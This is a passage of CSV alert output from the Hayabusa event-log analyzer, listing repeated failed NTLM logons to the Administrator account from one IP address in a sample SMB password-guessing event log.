+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: 
